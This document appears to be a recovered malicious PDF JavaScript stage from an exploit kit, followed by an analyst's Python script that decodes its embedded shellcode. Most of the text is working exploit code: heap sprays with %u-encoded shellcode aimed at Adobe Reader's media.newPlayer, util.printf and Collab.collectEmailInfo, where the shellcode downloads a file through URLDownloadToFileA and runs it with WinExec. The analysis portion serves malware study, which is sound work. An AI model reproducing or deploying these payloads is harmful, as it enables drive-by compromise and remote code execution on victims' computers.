�unction fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}�unction printd(){var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u6E5F%u7765");var nx = unescape("%u9342%u3f4a"); while(nx.length <= 32768) nx += nx; nx = nx.substring(0, 32768 - shellcode.length); memory = new Array(); for(i = 0; i < 0x2000; i++) { memory[i]= nx + shellcode; } util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); try {this.media.newPlayer(null);} catch(e) {} util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());}�unction util_printf(){var 
payload=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B");var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");%avar heapblock=nop+payload;var bigblock=unescape("%u0A0A%u0A0A");var headersize=20;var spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;}%avar fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}%avar mem_array=new Array();for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}%avar num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("E000f",num);}�unction collab_email(){var 
shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}%avar overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}%athis.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}�unction collab_geticon(){if(app
... (truncated)
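The %u-encoded shellcode in the recovered stages can be checked mechanically rather than read by eye. The Python below is an added example, not part of this report or the analyzer: it takes the util_printf() payload string exactly as shown in generic_stage_recovery_001.js, turns it into the byte sequence JavaScript unescape() leaves in memory, computes the classic ROR-13 export-name hash for a list of candidate Win32 API names and matches it against every mov eax, imm32 in the blob. It also recovers the "urlmon.d" fragment from the consecutive push imm32 instructions, the "e.ex" string immediate, and the ASCII tag that follows the last call. The candidate name list and the assumption that hashes and string material arrive through 0xB8/0x68 immediates are mine; the payload bytes are this page's data.

```python
import re
import struct
from typing import Dict, List, Tuple

# Shellcode string copied verbatim from the util_printf() branch of
# generic_stage_recovery_001.js as shown in this report.
PAYLOAD = (
    "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB"
    "%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB"
    "%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3"
    "%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238"
    "%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324"
    "%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3"
    "%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2"
    "%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F"
    "%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033"
    "%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70"
    "%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE"
    "%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B"
)

# Candidate export names are an assumption of this example: the table is built
# from names, so a hash that matches none of them simply goes unresolved.
CANDIDATES = [
    "LoadLibraryA", "GetProcAddress", "GetTempPathA", "URLDownloadToFileA",
    "WinExec", "ExitThread", "ExitProcess", "CreateProcessA", "VirtualAlloc",
    "CreateFileA", "WriteFile", "CloseHandle", "GetSystemDirectoryA",
]

def unescape_u16(s: str) -> bytes:
    """Bytes JavaScript unescape() leaves in memory for a %uXXXX string: each
    16-bit unit is stored little-endian, low byte first."""
    units = re.findall(r"%u([0-9A-Fa-f]{4})", s)
    return b"".join(struct.pack("<H", int(u, 16)) for u in units)

def ror13_hash(name: str) -> int:
    """Export-name hash of classic Win32 shellcode (skape's find_function):
    h = ror32(h, 13) + c over the ASCII name, no terminator."""
    h = 0
    for c in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + c) & 0xFFFFFFFF
    return h

def mov_eax_immediates(code: bytes) -> List[Tuple[int, int]]:
    """(offset, imm32) for every 0xB8 'mov eax, imm32' in the blob."""
    return [(off, struct.unpack_from("<I", code, off + 1)[0])
            for off in range(len(code) - 4) if code[off] == 0xB8]

def resolve_api_hashes(code: bytes) -> List[str]:
    """Candidate names whose ror13 hash is loaded into eax, in code order."""
    table = {ror13_hash(n): n for n in CANDIDATES}
    return [table[imm] for _, imm in mov_eax_immediates(code) if imm in table]

def ascii_immediates(code: bytes) -> List[str]:
    """mov eax immediates made of four printable bytes (string material)."""
    return [struct.pack("<I", imm).decode("ascii") for _, imm in mov_eax_immediates(code)
            if all(0x20 <= b < 0x7F for b in struct.pack("<I", imm))]

def pushed_string_fragments(code: bytes) -> List[str]:
    """Strings built on the stack by runs of consecutive 0x68 'push imm32'
    with printable immediates; the stack grows downward, so the immediates
    read back in reverse push order."""
    frags, off = [], 0
    while off < len(code) - 4:
        run = []
        while (off < len(code) - 4 and code[off] == 0x68
               and all(0x20 <= b < 0x7F for b in code[off + 1:off + 5])):
            run.append(code[off + 1:off + 5].decode("ascii"))
            off += 5
        if run:
            frags.append("".join(reversed(run)))
        else:
            off += 1
    return frags

def trailing_ascii(code: bytes) -> str:
    """Printable ASCII run at the very end of the blob (trailing NULs dropped)."""
    end = code.rstrip(b"\x00")
    i = len(end)
    while i > 0 and 0x20 <= end[i - 1] < 0x7F:
        i -= 1
    return end[i:].decode("ascii")

def summarize(payload: str = PAYLOAD) -> Dict[str, object]:
    code = unescape_u16(payload)
    return {
        # xor eax,eax / mov eax,fs:[eax+0x30]: the PEB walk that finds kernel32
        "peb_walk": code.startswith(b"\x33\xC0\x64\x8B\x40\x30"),
        "api_chain": resolve_api_hashes(code),
        "stack_strings": pushed_string_fragments(code),
        "ascii_immediates": ascii_immediates(code),
        "request_tag": trailing_ascii(code),
    }
```

Calling summarize() on the page's payload yields the chain GetTempPathA, LoadLibraryA, URLDownloadToFileA, WinExec, ExitThread, the stack fragment "urlmon.d" (the trailing "ll" is assembled in eax by the mov al / mov ah / cwde / push eax sequence just before the pushes) and the tag ?spl=pdf_pack. Running the same function on the printd() copy of the shellcode gives the same chain with the tag ?spl=pdf_new.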